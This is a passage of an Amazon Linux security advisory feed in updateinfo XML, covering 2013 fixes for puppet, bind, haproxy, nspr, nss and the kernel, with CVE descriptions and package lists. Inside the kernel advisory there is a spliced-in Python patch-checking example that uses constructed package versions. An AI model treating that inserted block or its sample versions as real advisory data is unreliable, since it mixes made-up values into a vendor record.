version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.17-2.40.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.17" release="2.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-bcmath-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.17" release="2.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-devel-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.17" release="2.40.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-debuginfo-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.17-2.40.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.17" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.17-2.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-213</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-213: critical priority package update for puppet</title><issued date="2013-07-12 15:57:00" /><updated date="2014-09-15 23:18:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3567:
974649:
CVE-2013-3567 puppet: remote code execution on master from unauthenticated clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3567" title="" id="CVE-2013-3567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="puppet" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.22" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.22-1.0.amzn1.x86_64.rpm</filename></package><package name="puppet-debuginfo" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.22-1.0.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.22-1.0.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.7.22" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.22-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-214</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-214: important priority package update for bind</title><issued date="2013-08-07 21:20:00" /><updated date="2014-09-15 23:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4854:
A denial of service flaw was found in BIND. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to crash when rejecting the malformed query.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4854" title="" id="CVE-2013-4854" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1114.html" title="" id="RHSA-2013:1114" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.30.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" 
release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.30.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-215</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-215: medium priority package update for haproxy</title><issued date="2013-08-07 21:21:00" /><updated date="2014-09-15 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2175:
HAProxy 1.4 before 1.4.24 and 1.5 before 1.5-dev19, when configured to use hdr_ip or other "hdr_*" functions with a negative occurrence count, allows remote attackers to cause a denial of service (negative array index usage and crash) via an HTTP header with a certain number of values, related to the MAX_HDR_HISTORY variable.
974259:
CVE-2013-2175 haproxy: http_get_hdr()/get_ip_from_hdr2() MAX_HDR_HISTORY handling denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2175" title="" id="CVE-2013-2175" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="haproxy-debuginfo" version="1.4.22" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/haproxy-debuginfo-1.4.22-5.3.amzn1.x86_64.rpm</filename></package><package name="haproxy" version="1.4.22" release="5.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/haproxy-1.4.22-5.3.amzn1.x86_64.rpm</filename></package><package name="haproxy" version="1.4.22" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/haproxy-1.4.22-5.3.amzn1.i686.rpm</filename></package><package name="haproxy-debuginfo" version="1.4.22" release="5.3.amzn1" epoch="0" arch="i686"><filename>Packages/haproxy-debuginfo-1.4.22-5.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-216</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-216: medium priority package update for nspr</title><issued date="2013-08-07 21:23:00" /><updated date="2014-09-15 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0791:
An out-of-bounds memory read flaw was found in the way NSS decoded certain certificates. If an application using NSS decoded a malformed certificate, it could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791" title="" id="CVE-2013-0791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1144.html" title="" id="RHSA-2013:1144" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr-devel" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.9.5" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.9.5-2.17.amzn1.x86_64.rpm</filename></package><package name="nspr" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.9.5-2.17.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.9.5-2.17.amzn1.i686.rpm</filename></package><package name="nspr-debuginfo" version="4.9.5" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.9.5-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-217</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-217: medium priority package update for nss</title><issued date="2013-08-07 21:23:00" /><updated date="2014-09-15 23:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1620:
It was discovered that NSS leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
CVE-2013-0791:
An out-of-bounds memory read flaw was found in the way NSS decoded certain certificates. If an application using NSS decoded a malformed certificate, it could cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791" title="" id="CVE-2013-0791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620" title="" id="CVE-2013-1620" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:1144.html" title="" id="RHSA-2013:1144" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-debuginfo" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.14.3" release="4.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.14.3-4.29.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.14.3" 
release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.14.3-4.29.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.14.3" release="4.29.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.14.3-4.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-218</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-218: medium priority package update for kernel</title><issued date="2013-08-13 21:32:00" /><updated date="2014-09-15 23:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-3301:
* A NULL pointer dereference flaw was found in the Linux kernel's ftrace and function tracer implementations. A local user who has the CAP_SYS_ADMIN capability could use this flaw to cause a denial of service.
CVE-2013-3225:
The rfcomm_sock_recvmsg function in net/bluetooth/rfcomm/sock.c in the Linux kernel before 3.9-rc7 does not initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955649:
CVE-2013-3225 Kernel: Bluetooth: RFCOMM - missing msg_namelen update in rfcomm_sock_recvmsg
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3224:
The bt_sock_recvmsg function in net/bluetooth/af_bluetooth.c in the Linux kernel before 3.9-rc7 does not properly initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955599:
CVE-2013-3224 Kernel: Bluetooth: possible info leak in bt_sock_recvmsg()
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-3222:
The vcc_recvmsg function in net/atm/common.c in the Linux kernel before 3.9-rc7 does not initialize a certain length variable, which allows local users to obtain sensitive information from kernel stack memory via a crafted recvmsg or recvfrom system call.
955216:
CVE-2013-3222 Kernel: atm: update msg_namelen in vcc_recvmsg()
* Information leaks in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2852:
Format string vulnerability in the b43_request_firmware function in drivers/net/wireless/b43/main.c in the Broadcom B43 wireless driver in the Linux kernel through 3.9.4 allows local users to gain privileges by leveraging root access and including format string specifiers in an fwpostfix modprobe parameter, leading to improper construction of an error message.
969518:
CVE-2013-2852 kernel: b43: format string leaking into error msgs
* A format string flaw was found in the b43_do_request_fw() function in the Linux kernel's b43 driver implementation. A local user who is able to specify the "fwpostfix" b43 module parameter could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-2635:
The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux kernel before 3.8.4 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel stack memory via a crafted application.
924690:
CVE-2013-2635 kernel: Information leak in the RTNETLINK component
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2634:
net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize certain structures, which allows local users to obtain sensitive information from kernel stack memory via a crafted application.
924689:
CVE-2013-2634 kernel: Information leak in the Data Center Bridging (DCB) component
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
CVE-2013-2234:
The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions in net/key/af_key.c in the Linux kernel before 3.10 do not initialize certain structure members, which allows local users to obtain sensitive information from kernel heap memory by reading a broadcast message from the notify interface of an IPSec key_socket.
980995:
CVE-2013-2234 Kernel: net: information leak in AF_KEY notify
CVE-2013-2232:
The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux kernel before 3.10 allows local users to cause a denial of service (system crash) by using an AF_INET6 socket for a connection to an IPv4 interface.
981552:
CVE-2013-2232 Kernel: ipv6: using ipv4 vs ipv6 structure during routing lookup in sendmsg
CVE-2013-2128:
The tcp_read_sock function in net/ipv4/tcp.c in the Linux kernel before 2.6.34 does not properly manage skb consumption, which allows local users to cause a denial of service (system crash) via a crafted splice system call for a TCP socket.
968484:
CVE-2013-2128 Kernel: net: oops from tcp_collapse() when using splice(2)
* A flaw was found in the tcp_read_sock() function in the Linux kernel's IPv4 TCP/IP protocol suite implementation in the way socket buffers (skb) were handled. A local, unprivileged user could trigger this issue via a call to splice(), leading to a denial of service.
CVE-2013-1848:
fs/ext3/super.c in the Linux kernel before 3.8.4 uses incorrect arguments to functions in certain circumstances related to printk input, which allows local users to conduct format-string attacks and possibly gain privileges via a crafted application.
920783:
CVE-2013-1848 kernel: ext3: format string issues
* A format string flaw was found in the ext3_msg() function in the Linux kernel's ext3 file system implementation. A local user who is able to mount an ext3 file system could use this flaw to cause a denial of service or, potentially, escalate their privileges.
CVE-2013-1059:
net/ceph/auth_none.c in the Linux kernel through 3.10 allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via an auth_reply message that triggers an attempted build_request operation.
977356:
CVE-2013-1059 Kernel: libceph: Fix NULL pointer dereference in auth client code
CVE-2013-0914:
The flush_signal_handlers function in kernel/signal.c in the Linux kernel before 3.8.4 preserves the value of the sa_restorer field across an exec operation, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application containing a sigaction system call.
920499:
CVE-2013-0914 Kernel: sa_restorer information leak
* An information leak was found in the Linux kernel's POSIX signals implementation. A local, unprivileged user could use this flaw to bypass the Address Space Layout Randomization (ASLR) security feature.
CVE-2012-6548:
The udf_encode_fh function in fs/udf/namei.c in the Linux kernel before 3.6 does not initialize a certain structure member, which allows local users to obtain sensitive information from kernel heap memory via a crafted application.
922353:
CVE-2012-6548 Kernel: udf: information leak on export
* Information leak flaws in the Linux kernel could allow a local, unprivileged user to leak kernel memory to user-space.
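Added example (not part of the updateinfo data and not Amazon's or yum's own tooling): a small Python check that walks this document's update, reference and pkglist structure, compares installed package EVRs against the fixed builds with a simplified reimplementation of rpm's rpmvercmp (assumption: tilde and caret ordering are not handled), and lists the advisories a host is still missing. The two-advisory document it builds mirrors the ALAS-2013-214 and ALAS-2013-218 entries on this page; the installed-package inventory is constructed for the demonstration. The bind case is the one to notice: the document carries epoch 32, so an installed 0:9.9.4 with a higher version string is still older than the fixed 32:9.8.2-0.17.rc1.30.amzn1, and a checker that compares version strings alone would wrongly report the host as patched.

```python
import re
import xml.etree.ElementTree as ET

# rpmvercmp compares runs of digits and runs of letters; every other character is a separator.
_SEG = re.compile(r"[0-9]+|[A-Za-z]+")


def rpmvercmp(a, b):
    """Simplified reimplementation of rpm's rpmvercmp (assumption: no tilde/caret handling).
    Returns 1 if a is newer, -1 if b is newer, 0 if they are equal."""
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for x, y in zip(sa, sb):
        xd, yd = x.isdigit(), y.isdigit()
        if xd and yd:
            xi, yi = int(x), int(y)  # numeric segments compare as integers (leading zeros ignored)
            if xi != yi:
                return 1 if xi > yi else -1
        elif xd != yd:
            return 1 if xd else -1  # rpm rule: a numeric segment is newer than an alphabetic one
        elif x != y:
            return 1 if x > y else -1  # alphabetic segments compare lexically
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1  # remaining segments make that side newer


def evrcmp(evr_a, evr_b):
    """Compare (epoch, version, release) tuples the way rpm does: epoch first, then version, then release."""
    for x, y in zip(evr_a, evr_b):
        r = rpmvercmp(str(x), str(y))
        if r != 0:
            return r
    return 0


def parse_updateinfo(xml_text):
    """Extract advisory id, severity, CVE ids and fixed (epoch, version, release) per (name, arch)."""
    root = ET.fromstring(xml_text)
    advisories = []
    for upd in root.iter("update"):
        cves = [ref.get("id") for ref in upd.iter("reference") if ref.get("type") == "cve"]
        fixed = {}
        for pkg in upd.iter("package"):
            key = (pkg.get("name"), pkg.get("arch"))
            fixed[key] = (pkg.get("epoch", "0"), pkg.get("version"), pkg.get("release"))
        advisories.append({"id": upd.findtext("id"), "severity": upd.findtext("severity"),
                           "cves": cves, "fixed": fixed})
    return advisories


def missing_advisories(advisories, installed):
    """Return (advisory id, name, arch, installed EVR, fixed EVR) for every installed package
    that is older than the fixed build. installed maps (name, arch) to (epoch, version, release)."""
    hits = []
    for adv in advisories:
        for key, fixed_evr in adv["fixed"].items():
            inst = installed.get(key)
            if inst is not None and evrcmp(fixed_evr, inst) > 0:
                hits.append((adv["id"], key[0], key[1], inst, fixed_evr))
    return hits


def build_sample():
    """Constructed two-advisory document modelled on the ALAS-2013-214 and ALAS-2013-218 entries
    (built with ElementTree rather than pasted, so the page's own XML stays untouched)."""
    root = ET.Element("updates")

    def add(adv_id, severity, cves, pkgs):
        upd = ET.SubElement(root, "update", status="final", type="security")
        ET.SubElement(upd, "id").text = adv_id
        ET.SubElement(upd, "severity").text = severity
        refs = ET.SubElement(upd, "references")
        for cve in cves:
            ET.SubElement(refs, "reference", id=cve, type="cve")
        coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
        for name, ver, rel, epoch, arch in pkgs:
            ET.SubElement(coll, "package", name=name, version=ver, release=rel, epoch=epoch, arch=arch)

    add("ALAS-2013-214", "important", ["CVE-2013-4854"],
        [("bind", "9.8.2", "0.17.rc1.30.amzn1", "32", "x86_64")])
    add("ALAS-2013-218", "medium", ["CVE-2013-0914", "CVE-2013-2852"],
        [("kernel", "3.4.57", "48.42.amzn1", "0", "x86_64")])
    return ET.tostring(root, encoding="unicode")


# Constructed installed-package inventory (on a real host this comes from rpm -qa --qf output).
INSTALLED = {
    ("bind", "x86_64"): ("0", "9.9.4", "1.amzn1"),         # higher version string, but epoch 0 loses to 32
    ("kernel", "x86_64"): ("0", "3.4.43", "43.43.amzn1"),  # plainly older than 3.4.57-48.42.amzn1
    ("haproxy", "x86_64"): ("0", "1.4.22", "5.3.amzn1"),   # not in the sample document, so never reported
}

if __name__ == "__main__":
    for hit in missing_advisories(parse_updateinfo(build_sample()), INSTALLED):
        print(hit)
```

Run against a real cache file, replace build_sample() with the file contents and INSTALLED with the output of rpm -qa formatted as name, arch, epoch, version, release; the epoch must be read from rpm (it prints "(none)" for 0), not guessed from the version string.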
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6548" title="" id="CVE-2012-6548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0914" title="" id="CVE-2013-0914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1059" title="" id="CVE-2013-1059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1848" title="" id="CVE-2013-1848" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2128" title="" id="CVE-2013-2128" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2232" title="" id="CVE-2013-2232" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2234" title="" id="CVE-2013-2234" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2634" title="" id="CVE-2013-2634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2635" title="" id="CVE-2013-2635" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2852" title="" 